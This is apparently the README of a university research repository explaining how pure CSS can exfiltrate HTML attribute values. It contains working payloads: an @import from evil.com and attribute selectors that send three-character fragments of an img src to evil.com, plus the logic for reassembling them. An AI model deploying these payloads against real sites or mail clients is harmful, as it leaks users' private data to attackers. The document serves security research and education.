By utilizing the possibilities of CSS selectors such as img[src*='xyz'], we can exfiltrate text from HTML attributes with pure CSS.
The idea is inspired by Paul Gerste's talk "Stealing With Style: Using CSS to Exploit ProtonMail & Friends" at Black Hat 2023.
We want to exfiltrate the image src attribute using pure CSS (can be any other attribute or element):
<style>
@import url("http://evil.com/style.css");
</style>
<img src="abcde">
- The client uses
@importto load the malicious CSS file from our attacker server. This file consists of selectors that cover all possible 3-digit character combinations that the secret could contain.
img[src*='abc']{
--abc: url('http://evil.com/?fragment=abc');
}
img[src*='bcd']{
--bcd: url('http://evil.com/?fragment=bcd');
}
img[src*='cde']{
--cde: url('http://evil.com/?fragment=cde');
}
- The client thus sends all 3-digit character combinations that occur in the attribute to the server.
- The server reassembles the snippets like a puzzle to obtain the secret.
Received: cde, abc, bcd
1. Merge 'cde' + 'bcd' -> 'bcde'
2. Merge 'abc' + 'bcde' -> 'abcde'
Secret is: abcde
- The composition of the fragments is not always unambiguous and several possible results may exist
- Long texts with a large character space (i.e. many different characters occur) generate excessively large payloads
- The length and the characters contained in the secret must be known
- A 3-digit combination can only get matched once
This repository was created during security research at university. It is only intended for educational purposes and should not be used for illegal activities. The author assumes no liability for any damage caused by the use of the code.